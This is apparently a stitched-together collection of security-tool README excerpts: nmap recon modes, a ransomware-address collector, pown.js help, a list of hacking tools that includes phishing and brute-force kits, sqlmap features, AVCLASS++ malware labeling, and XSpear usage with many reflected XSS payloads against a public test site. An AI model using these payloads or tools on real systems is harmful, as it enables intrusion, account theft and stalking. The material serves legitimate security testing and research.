1. Quick: Shows all open ports quickly (~15 seconds)
2. Basic: Runs Quick Scan, then a runs more thorough scan on found ports (~5 minutes)
3. UDP: Runs "Basic" on UDP ports (~5 minutes)
4. Full: Runs a full range port scan, then runs a thorough scan on new ports (~5-10 minutes)
5. Vulns: Runs CVE scan and nmap Vulns scan on all found ports (~5-15 minutes)
6. Recon: Runs "Basic" scan "if not yet run", then suggests recon commands "i.e. gobuster, nikto, smbmap" based on the found ports, then prompts to automatically run them
7. All: Runs all the scans consecutively (~20-30 minutes)

apt-get update
apt-get install gobuster --only-upgrade  

sudo apt-get install build-essential libpoppler-cpp-dev pkg-config python-dev python3-tlsh

python3 -m pip install -r requirements.txt

sudo apt-get install python3-pip

python3 coinlector.py

less Ransomware.csv

• Bitcoin Addresses (BTC)
• Bitcoin Cash Addresses (BCH)
• Monero Addresses (XMR)
• Bitcoin Private Keys
• Ethereum addresses (ETH)
• Ripple addresses (XRP)
• LTC addresses (LTC)
• DOGECOIN addresses (DOGE)
• NEO addresses (NEO)
• DASH addresses (DASH)
• Domains (Address)
• Email Addresses (Email)
• Onion Addresses (Address)

less Ransomware.csv | grep URL

less Ransomware.csv | grep Email

less Ransomware.csv | grep Address

less Ransomware.csv | grep XMR

python3 tempuscoin.py

less TemporalRansoms.csv

$ npm install -g pown@latest

pown [options] <command> [command options]

Commands:
  pown modules <command>               Module manager  [aliases: module, m]
  pown update [options]                Update global installation of pown  [aliases: upgrade, up]
  pown buster <command>                Multi-service bruteforce discovery tool  [aliases: bust]
  pown credits [options]               list contributors and credits
  pown dicts [options] <search>        Assorted Dictionaries
  pown duct <command>                  Side-channel attack enabler  [aliases: ducting, d]
  pown figlet <text>                   Generate figlet
  pown preferences <command>           Preferences  [aliases: prefs]
  pown proxy [options] [command]       HTTP proxy
  pown recon <command>                 Target recon
  pown script [file   |script] [args...]  Simple scripting engine for automating pown commands.
  pown shell [options]                 Simple shell
  pown whoarethey <accounts...>        find social networking accounts and more

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown modules <command>

Module manager

Commands:
  pown modules install <modules...>    Install modules
  pown modules uninstall <modules...>  Uninstall modules
  pown modules update [modules...]     Update modules
  pown modules list                    List install modules
  pown modules search <terms...>       Search modules

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown update [options]

Update global installation of pown

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown buster <command>

Multi-service bruteforce discovery tool

Commands:
  pown buster web [options] <url>       Web file and directory bruteforcer (a.k.a dirbuster)
  pown buster email [options] <domain>  Email bruteforce discovery tool (via smtp)  [aliases: emails]

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown credits [options]

list contributors and credits

Options:
  --version   Show version number  [boolean]
  --help      Show help  [boolean]
  --only, -o  Only Pown.js contributors  [boolean]

pown dicts [options] <search>

Assorted Dictionaries

Options:
  --version       Show version number  [boolean]
  --help          Show help  [boolean]
  --download, -d  Download found dictionaries  [boolean] [default: false]
  --regex, -r     Search with regex  [boolean] [default: false]

pown duct <command>

Side-channel attack enabler

Commands:
  pown duct dns  DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown figlet <text>

Generate figlet

Options:
  --version   Show version number  [boolean]
  --help      Show help  [boolean]
  --font, -f  FIGlet font to use  [string] [default: "Standard"]
  --fg        Foreground color  [choices: "default", "black", "red", "green", "yellow", "blue", "magenta", "cyan", "white", "gray", "grey"] [default: "default"]
  --bg        Background color  [choices: "default", "black", "red", "green", "yellow", "blue", "magenta", "cyan", "white"] [default: "default"]
  --bold      Make it bold  [boolean] [default: false]

pown preferences <command>

Preferences

Commands:
  pown preferences get <tool> [name]          get preferences
  pown preferences set <tool> <name> <value>  set preferences

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown proxy [options] [command]

HTTP proxy

Options:
  --version                 Show version number  [boolean]
  --help                    Show help  [boolean]
  --log, -l                 Log requests and responses  [boolean] [default: false]
  --host, -h                Host to listen to  [string] [default: "0.0.0.0"]
  --port, -p                Port to listen to  [number] [default: 8080]
  --text, -t                Start with text ui  [boolean] [default: false]
  --ws-client, -c           Connect to web socket  [string] [default: ""]
  --ws-server, -s           Forward on web socket  [boolean] [default: false]
  --ws-host                 Web socket server host  [string] [default: "0.0.0.0"]
  --ws-port                 Web socket server port  [number] [default: 9090]
  --ws-app                  Open app  [string] [choices: "", "httpview"] [default: ""]
  --certs-dir               Directory for the certificates  [string] [default: "/home/ec2-user/.pown/proxy/certs"]
  --server-key-length       Default key length for certificates  [number] [default: 1024]
  --default-ca-common-name  The CA common name  [string] [default: "Pown.js Proxy"]

pown recon <command>

Target recon

Commands:
  pown recon transform <transform>        Perform inline transformation  [aliases: t]
  pown recon select <selectors...>        Select nodes  [aliases: s]
  pown recon add <nodes...>               Add nodes  [aliases: a]
  pown recon remove <selectors...>        Remove nodes  [aliases: r]
  pown recon merge <files...>             Perform a merge between at least two recon files  [aliases: m]
  pown recon diff <fileA> <fileB>         Perform a diff between two recon files  [aliases: d]
  pown recon group <name> <selectors...>  Group nodes  [aliases: g]
  pown recon ungroup <selectors...>       Ungroup nodes  [aliases: u]
  pown recon import <file>                Import file  [aliases: i]
  pown recon export <file>                Export to file  [aliases: e]

Options:
  --version  Show    version number  [boolean]
  --help     Show help  [boolean]

pown script [file|script] [args...]

Simple scripting engine for automating pown commands.

Options:
  --version      Show version number  [boolean]
  --help         Show help  [boolean]
  --command, -c  Evaluate inline commands  [boolean] [default: false]
  --exit, -e     Exit immediately  [boolean] [default: false]
  --expand, -x   Expand command  [boolean] [default: false]
  --skip, -s     Skip number of lines  [number] [default: 0]

pown shell [options]

Simple shell

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown whoarethey <accounts...>

find social networking accounts and more

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

1. Hijacker - All-in-One Wi-Fi Cracking Tools for Android


2. Findomain - The Fastest And Cross-Platform Subdomain Enumerator


3. EagleEye - Stalk Your Friends. Find Their Instagram, FB And Twitter Profiles Using Image Recognition And Reverse Image Search


4. ANDRAX - Penetration Testing on Android


5. CQTools - The New Ultimate Windows Hacking Toolkit


6. Sampler - A Tool For Shell Commands Execution, Visualization And Alerting (Configured With A Simple YAML File)


7. LOIC (Low Orbit Ion Cannon) - A network stress testing application


8. EasySploit - Metasploit Automation (EASIER And FASTER Than EVER)


9. ScanQLi - Scanner To Detect SQL Injection Vulnerabilities


10. SQLMap - Automatic SQL Injection And Database Takeover Tool


11. OKadminFinder - Admin Panel Finder / Admin Login Page Finder


12. Shellphish - Phishing Tool For 18 Social Media (Instagram, Facebook, Snapchat, Github, Twitter...)


13. DNS-Shell - An Interactive Shell Over DNS Channel


14. QRLJacker - QRLJacking Exploitation Framework


15. PhoneSploit - Using Open Adb Ports We Can Exploit A Devive


16. SocialBox - A Bruteforce Attack Framework (Facebook, Gmail, Instagram, Twitter)


17. Instainsane - Multi-threaded Instagram Brute Forcer


18. Tool-X - A Kali Linux Hacking Tool Installer


19. Hacktronian - All In One Hacking Tool For Linux & Android


20. Ultimate Facebook Scraper - A Bot Which Scrapes Almost Everything About A Facebook User'S Profile Including All Public Posts/Statuses Available On The User'S Timeline, Uploaded Photos, Tagged Photos, Videos, Friends List And Their Profile Photos

• To list all the basic options and switches use -h switch:

• To enumerate subdomains of a specific domain, perform advanced analysis, and save the analysis to a file:

• Read subdomains from a file and perform advanced analysis on them:

• Using -r to populate DNS resolvers from a file (resolvers used with -a analysis module):

• To enumerate subdomains of specific domain:

• To enumerate subdomains of specific domain and save discovered subdomains to a file:

• To enumerate subdomains of specific domain and show the results in realtime:

• To enumerate subdomains and enable the bruteforce module:

• To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines

• Install for Ubuntu/Debian:

sudo apt-get install python-requests

• Install for Centos/Redhat:

sudo yum install python-requests

• Install using pip on Linux:

sudo pip install requests

• Install for Ubuntu/Debian:

sudo apt-get install python-argparse

• Install for Centos/Redhat:

sudo yum install python-argparse

• Install using pip:

sudo pip install argparse

• aboul3la - The creator of Sublist3r; turbolist3r adds some features but is otherwise a near clone of sublist3r.
• TheRook - The bruteforce module was based on his script subbrute.
• bitquark - The Subbrute's wordlist was based on his research dnspop.

• Thank you to aboul3la for releasing sublist3r, an incredible subdomain discovery tool!

• Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
• Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
• Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
• Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
• Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
• Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
• Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
• Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

python sqlmap.py -h

python sqlmap.py -hh

• Homepage: http://sqlmap.org
• Download: .tar.gz or .zip
• Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
• Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
• User's manual: https://github.com/sqlmapproject/sqlmap/wiki
• Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
• Twitter: @sqlmap
• Demos: http://www.youtube.com/user/inquisb/videos
• Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

• Input:
  • VirusTotal report(s)
  • Malware binar(y|ies) (optional)
• Output:
  • Malware label(s) (family name)

• Automatic. AVCLASS++ removes manual analysis limitations on the size of the input dataset.
• Vendor-agnostic. AVCLASS++ operates on the labels of any available set of AV engines, which can vary from sample to sample.
• Cross-platform. AVCLASS++ can be used for any platforms supported by AV engines, e.g., Windows or Android malware.
• Does not require executables. AV labels can be obtained from online services like VirusTotal using a sample's hash, even when the executable is not available. Yet, AVCLASS++ has also a potential that can improve label accuracy if there is an executable.
• Quantified accuracy. The original AVCLASS had evaluated [1] on five publicly available malware datasets with ground truth. AVCLASS++ is further tuned to perform under adverse conditions.
• Open source. We are happy to release AVCLASS++ to the community. Prithee, use it for the further development of prompt security operation and reproducible security research!

The main limitation of AVClass is that its output depends on the input AV labels. It tries to compensate for the noise on those labels, but cannot identify the family of a sample if AV engines do not provide non-generic family names to that sample. In particular, it cannot label samples if at least 2 AV engines do not agree on a non-generic family name. Results on 8 million samples showed that AVClass could label 81% of the samples. In other words, it could not label 19% of the samples because their labels contained only generic tokens.

• First, AVCLASS is prone to fail labeling samples that have just been posted to VirusTotal because only a few anti-viruses give labels to such samples. Such a sample will be labeled SINGLETON. An inconvenient truth: when we provided AVCLASS with 20,000 VirusTotal reports, half of them were labeled SINGLETON.
• Second, AVCLASS cannot determine if the label is randomly generated (as with domain generation algorithms of malware) or not. Some anti-viruses that VirusTotal has worked with after AVCLASS released were labeled with the DGA, resulting in a biased label.

• Label propagation. AVCLASS++ accepts not only VirusTotal reports but also binary executable files of samples as input, and measures the similarity between them, thereby propagating [3] a malware label to the one labeled SINGLETON. Here, AVCLASS++ exploits hashed features based on various perspective [4] e.g, byte histogram, printable strings, file size, PE headers, sections, imports, exports, and more! Then it calculates the similarity of the samples through deriving an affinity matrix and re-labels SINGLETONs as a result of the propagation from a similar sample. This enables us to reduce SINGLETONs.
• DGA detection. AVCLASS++ determines if labels were generated by DGA and removes such ones from the candidates. This technique is based on the meaningful characters ratio and $N$-gram normality score [5]. In other words, AVCLASS + + verifies that the label presented by AV is meaningful and easy to pronounce, and then determines if the label is generated by DGA. This enables us to unbiased labeling.

git clone git@github.com:malrev/avclassplusplus.git
./setup.sh

python avclass_labeler.py -lb data/malheurReference_lb.json -v > malheurReference.labels

aca2d12934935b070df8f50e06a20539 adrotator
67d15459e1f85898851148511c86d88d adultbrowser

aca2d12934935b070df8f50e06a20539  [('adrotator', 8), ('zlob', 2)]
ee90a64fcfaa54a314a7b5bfe9b57357  [('swizzor', 19)]
f465a2c1b852373c72a1ccd161fbe94c  SINGLETON:f465a2c1b852373c72a1ccd161fbe94c

1. VirusTotal JSON reports (-vt file), where each line in file should be the full JSON of a VirusTotal report as fetched through the VirusTotal API.
   
2. Simplified JSON (-lb file), where each line in file should be a JSON with (at least) these fields: {md5, sha1, sha256, scan_date, av_labels}. There is an example of such input file in data/malheurReference_lb.json This option works well if you want to use label candidates from a source other than VirusTotal or from a self-made engine.
   

python avclass_labeler.py -vt <file1> -vt <file2> > all.labels

python avclass_labeler.py -lb <file1> -lb <file2> > all.labels

python avclass_labeler.py -vtdir <directory> > all.labels

python avclass_labeler.py -vt <file> -vtdir <directory> > all.labels

python avclass_labeler.py -vt <file1> -lb <file2> > all.labels

python avclass_propagator.py -labels <file1> -sampledir <directory> -results <file2>

python avclass_propagator.py -labels input.labels -sampledir samples -results output.labels -opt

• Meaningful characters ratio. This score indicates how many meaningful words within a label (the higher the better). Specifically, we split the label string $p$ into $k$ subwords $|w_i| ≥ 3$, then compute $R(p) = max(\frac{(\sum_{i=1 \in k}) |w_{i}|)}{|p|}$.
• $N$-gram normality score. This score indicates how many words which are easy to pronounce within a label (the higher the better). Specifically, we compute $N$-gram $t$ of the label string $p$, count the occurrence $count(t)$ in the dictionary, and calculate the average of them. That is, $S_n(p) = \frac{\sum_{n-gram;t \in p} count(t)}{|p|-n+1}$ where $N$ is given. From our experience, we highly recommend setting $N > 3$.

python avclass_labeler.py -vtdir <directory> -dgadetect <dictionary> <n> <threshold> > all.labels

python avclass_labeler.py -vtdir <directory> -dgadetect data/top10000en.txt 4 2 > all.labels

python avclass_labeler.py -lb data/malheurReference_lb.json -v -fam > malheurReference.labels

virut 441
allaple 301
podnuha 300

cut -f 2 malheurReference.labels | sort | uniq -c | sort -nr

python avclass_labeler.py -lb data/malheurReference_lb.json -v -pup > malheurReference.labels

aca2d12934935b070df8f50e06a20539 adrotator 1
67d15459e1f85898851148511c86d88d adultbrowser 0

python avclass_labeler.py -lb data/malheurReference_lb.json -v -pup -fam > malheurReference.labels

# Family  Total Malware PUP FamType
virut 441 441 0 malware
magiccasino 173 0 173 pup
ejik  168 124 44  malware

python avclass_labeler.py -lb data/malheurReference_lb.json -v -gt data/malheurReference_gt.tsv -eval > data/malheurReference.labels

Calculating precision and recall
3131 out of 3131
Precision: 90.81  Recall: 93.95 F1-Measure: 92.35

0058780b175c3ce5e244f595951f611b8a24bee2 CASINO

python avclass_generic_detect.py -lb data/malheurReference_lb.json -gt data/malheurReference_gt.tsv -tgen 10 > malheurReference.gen 

0058780b175c3ce5e244f595951f611b8a24bee2 CASINO

python avclass_alias_detect.py -lb data/malheurReference_lb.json -nalias 100 -talias 0.98 > malheurReference.aliases

1. t1: token that is an alias
2. t2: family for which t1 is an alias
3. |t1|: number of input samples where t1 was observed
4. |t2|: number of input samples where t2 was observed
5. |t1^t2|: number of input samples where both t1 and t2 were observed
6. |t1^t2|/|t1|: ratio of input samples where both t1 and t2

• [1] Marcos Sebastián, Richard Rivera, Platon Kotzias, and Juan Caballero. 2016. AVCLASS: A tool for Massive Malware Labeling. In Proceedings of the 19th International Symposium on Research in Attacks, Intrusions and Defenses (RAID'16). 230--253. (If you wish to cite the original AVCLASS, please cite this paper; if you wish to cite AVCLASS++, just refer to this repository URL)
• [2] Platon Kotzias, Srdjan Matic, Richard Rivera, and Juan Caballero. 2015. Certified PUP: Abuse in Authenticode Code Signing. In Proceedings of the 22nd ACM Conference on Computer and Communication Security (CCS'15). 465--478.

• [3] Xiaojin Zhu and Zoubin Ghahramani. 2002. Learning from Labeled and Unlabeled Data with Label Propagation. Technical Report CMU-CALD-02-107, Carnegie Mellon University.
• [4] Hyrum S. Anderson and Phil Roth. 2018. EMBER: An Open Dataset for Training Static PE Malware Machine Learning Models. CoRR, abs/1804.04637.
• [5] Stefano Schiavoni, Federico Maggi, Lorenzo Cavallaro, and Stefano Zanero. 2014. Phoenix: DGA-Based Botnet Tracking and Intelligence. In Proceeding of the 11th Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA'14). 192--211.

• Pattern matching based XSS scanning
• Detect alertconfirmprompt event on headless browser (with Selenium)
• Testing request/response for XSS protection bypass and reflected(or all) params
  
  • Reflected Params
  • All params(for blind xss, anytings)
  • Filtered test event handlerHTML tagSpecial CharUseful code
• Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
• Dynamic/Static Analysis
  • Find SQL Error pattern
  • Analysis Security headers(CSPHSTSX-frame-options, XSS-protection etc.. )
  • Analysis Other headers..(Server version, Content-Type, etc...)
  • XSS Testing to URI Path
• Scanning from Raw file(Burp suite, ZAP Request)
• XSpear running on ruby code(with Gem library)
• Show table base cli-report and filtered rule, testing raw query(url)
• Testing at selected parameters
• Support output format clijson
  • cli: summary, filtered rule(params), Raw Query
• Support Verbose level (0~3)
  • 0: quite mode(only result)
  • 1: show scanning status(default)
  • 2: show scanning logs
  • 3: show detail log(req/res)
• Support custom callback code to any test various attack vectors
• Support Config file

$ gem install XSpear

$ gem install XSpear-{version}.gem

gem 'XSpear'

$ bundle

$ gem install colorize
$ gem install selenium-webdriver
$ gem install terminal-table
$ gem install progress_bar

Usage: xspear -u [target] -[options] [value]
[ e.g ]
$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a 
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2

[ Options ]
    -u, --url=target_URL             [required] Target Url
    -d, --data=POST Body             [optional] POST Method Body data
    -a, --test-all-params            [optional] test to all params(include not reflected)
        --headers=HEADERS            [optional] Add HTTP Headers
        --cookie=COOKIE              [optional] Add Cookie
        --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)
    -p, --param=PARAM                [optional] Test paramters
    -b, --BLIND=URL                  [optional] Add vector of Blind XSS
                                      + with XSS Hunter, ezXSS, HBXSS, etc...
                                      + e.g : -b https://hahwul.xss.ht
       -t, --threads=NUMBER             [optional] thread , default: 10
    -o, --output=FORMAT              [optional] Output format (cli , json)
    -c, --config=FILENAME            [optional] Using config.json
    -v, --verbose=0~3                [optional] Show log depth
                                      + v=0 : quite mode(only result)
                                      + v=1 : show scanning status(default)
                                      + v=2 : show scanning logs
                                      + v=3 : show detail log(req/res)
    -h, --help                       Prints this help
        --version                    Show XSpear version
        --update                     Show how to update

• (I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)
• (V)UNL: Vulnerable XSS, Checked alert/prompt/confirm with Selenium
• (L)OW: Low level issue
• (M)EDIUM: medium level issue
• (H)IGH: high level issue

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 0
you see report

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 1
[*] analysis request..
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]

[#######################################] [249/249] [100.00%] [01:05] [00:00] [  3.83/s]
...
you see report

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
[*] analysis request..
[I] [22:42:41] [200/OK] [param: cat][Found SQL Error Pattern]
[-] [22:42:41] [200/OK] 'STATIC' not reflected
[-] [22:42:41] [200/OK] 'cat' not reflected <script>alert(45)</script>
[I] [22:42:41] [200/OK] reflected rEfe6[param: cat][reflected parameter]
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]
[I] [22:42:43] [200/OK] reflected onhwul=64[param: cat][reflected EHon{any} pattern]
[-] [22:42:54] [200/OK] 'cat' not reflected <img/src onerror=alert(45)>
[-] [22:42:54] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
[H] [22:42:54] [200/OK] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
[V] [22:42:59] [200/OK] found al   ert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>]
...
you see report

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 3
[*] analysis request..
[-] [22:56:21] [200/OK] http://testphp.vulnweb.com/listproducts.php?cat=123 in url
[ Request ]
{"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
[ Response ]
{"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:53:23 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
[-] [22:56:21] [200/OK] 'STATIC' not reflected
[-] [22:56:21] [200/OK] cat=123rEfe6 in url
...
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 que   ry]
[*] starting XSS Scanning. [10 threads]
...
[ Request ]
{"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
[ Response ]
{"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:54:36 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
[H] [22:57:33] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
...
you see report

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht" -a

# Set your blind xss host. <-b options>

$ xspear -u {target} -b "your-blind-xss-host" -a -v 0 -o json

# -u : target 
# -b : testing blind xss
# -a : test all params(test to not reflected param)
# -v : verbose, not showing logs at value 1.
# -o : output optios, json!

{
    "starttime": "2019-12-25 00:02:58 +0900",
    "endtime": "2019-12-25 00:03:31 +0900",
    "issue_count": 25,
    "issue_list": [{
        "id": 0,
        "type": "INFO",
        "issue": "DYNAMIC ANALYSIS",
        "method": "GET",
        "param": "cat",
        "payload": "XsPeaR\"",
        "description": "Found SQL Error Pattern"
    }, {
        "id": 1,
        "type": "INFO",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Found Server: nginx/1.4.1"
    }, {
        "id": 2,
        "type": "INFO",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Not set HSTS"
    }, {
        "id": 3,
        "type": "INFO",
        "issue": "STATIC    ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Content-Type: text/html"
    }, {
        "id": 4,
        "type": "LOW",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Not Set X-Frame-Options"
    }, {
        "id": 5,
        "type": "MIDUM",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Not Set CSP"
    }, {
        "id": 6,
        "type": "INFO",
        "issue": "REFLECTED",
        "method": "GET",
        "param": "cat",
        "payload": "rEfe6",
        "description": "reflected parameter"
    }, {
        "id": 7,
        "type": "INFO",
        "issue": "FILER   D RULE",
        "method": "GET",
        "param": "cat",
        "payload": "onhwul=64",
        "description": "not filtered event handler on{any} pattern"
    }
....
, {
        "id": 17,
        "type": "HIGH",
        "issue": "XSS",
        "method": "GET",
        "param": "cat",
        "payload": "<audio src onloadstart=alert(45)>",
        "description": "reflected HTML5 XSS Code"
    }, {
        "id": 18,
        "type": "HIGH",
        "issue": "XSS",
        "method": "GET",
        "param": "cat",
        "payload": "<keygen autofocus onfocus=alert(45)>",
        "description": "reflected onfocus XSS Code"
 ....
    }, {
        "id": 24,
        "type": "HIGH",
        "issue": "XSS",
        "method": "GET",
        "param": "cat",
        "payload": "<marquee onstart=alert(45)>",
        "description": "triggered <marquee    onstart=alert(45)>"
    }]
}

xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"
    )  (
 ( /(  )\ )
 )\())(()/(          (     )  (
((_)\  /(_))`  )    ))\ ( /(  )(
__((_)(_))  /(/(   /((_))(_))(()\
\ \/ // __|((_)_\ (_)) ((_)_  ((_)
>  < \__ \| '_ \)/ -_)/ _` || '_|
/_/\_\|___/| .__/ \___|\__,_||_|    />
           |_|                   \ /<
{\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
                                 / \<
                                    \>       [ v1.1.5 ]
...snip...
[*] finish scan. the report is being generated..
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
|                                                            [ XSpear report ]                                                            |
|                              http://testphp.vulnweb.com/listproducts.   php?cat=123&zfdfasdf=124fff... (snip)                              |
|                                 2019-08-14 23:50:34 +0900 ~ 2019-08-14 23:51:07 +0900 Found 24 issues.                                  |
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
| NO | TYPE  | ISSUE            | METHOD | PARAM | PAYLOAD                                | DESCRIPTION                                   |
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
| 0  | INFO  | STATIC ANALYSIS  | GET    | -     | <original query>                       | Found Server: nginx/1.4.1                     |
| 1  | INFO  | STATIC ANALYSIS  | GET    | -     | <original query>                       | Not set HSTS                                  |
| 2  | INFO  | STATIC ANALYSIS  | GET    | -        | <original query>                       | Content-Type: text/html                       |
| 3  | LOW   | STATIC ANALYSIS  | GET    | -     | <original query>                       | Not Set X-Frame-Options                       |
| 4  | MIDUM | STATIC ANALYSIS  | GET    | -     | <original query>                       | Not Set CSP                                   |
| 5  | INFO  | DYNAMIC ANALYSIS | GET    | cat   | XsPeaR"                                | Found SQL Error Pattern                       |
| 6  | INFO  | REFLECTED        | GET    | cat   | rEfe6                                  | reflected parameter                           |
| 7  | INFO  | FILERD RULE      | GET    | cat   | onhwul=64                              | not filtered event handler on{any} pattern    |
| 8  | HIGH  | XSS              | GET    | cat   | <script>alert(45)</script>             | reflected XSS Code                            |
| 9     | HIGH  | XSS              | GET    | cat   | <marquee onstart=alert(45)>            | reflected HTML5 XSS Code                      |
| 10 | HIGH  | XSS              | GET    | cat   | <details/open/ontoggle="alert`45`">    | reflected HTML5 XSS Code                      |
| 11 | HIGH  | XSS              | GET    | cat   | <select autofocus onfocus=alert(45)>   | reflected onfocus XSS Code                    |
| 12 | HIGH  | XSS              | GET    | cat   | <input autofocus onfocus=alert(45)>    | reflected onfocus XSS Code                    |
| 13 | HIGH  | XSS              | GET    | cat   | <textarea autofocus onfocus=alert(45)> | reflected onfocus XSS Code                    |
| 14 | HIGH  | XSS              | GET    | cat   | <audio src onloadstart=alert(45)>      | reflected HTML5 XSS Code                      |
| 15 | HIGH  | XSS              | GET    | cat   | <meter onmouseover=alert(45)>0</meter&gt   ; | reflected HTML5 XSS Code                      |
| 16 | HIGH  | XSS              | GET    | cat   | "><iframe/src=JavaScriPt:alert(45)>    | reflected XSS Code                            |
| 17 | HIGH  | XSS              | GET    | cat   | <video/poster/onerror=alert(45)>       | reflected HTML5 XSS Code                      |
| 18 | HIGH  | XSS              | GET    | cat   | <keygen autofocus onfocus=alert(45)>   | reflected onfocus XSS Code                    |
| 19 | VULN  | XSS              | GET    | cat   | <script>alert(45)</script>             | triggered <script>alert(45)</script>          |
| 20 | HIGH  | XSS              | GET    | cat   | <marquee onstart=alert(45)>            | triggered <marquee onstart=alert(45)>         |
| 21 | HIGH  | XSS              | GET    | cat   | <details/open/ontoggle="alert(45)">    | triggered <details/open/ontoggle="alert(45)"> |
| 22 | H   IGH  | XSS              | GET    | cat   | <audio src onloadstart=alert(45)>      | triggered <audio src onloadstart=alert(45)>   |
| 23 | VULN  | XSS              | GET    | cat   | '"><svg/onload=alert(45)>              | triggered <svg/onload=alert(45)>              |
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
< Available Objects >
[cat] param
 + Available Special Char: ` ( \ ' { ) } [ : $ ]
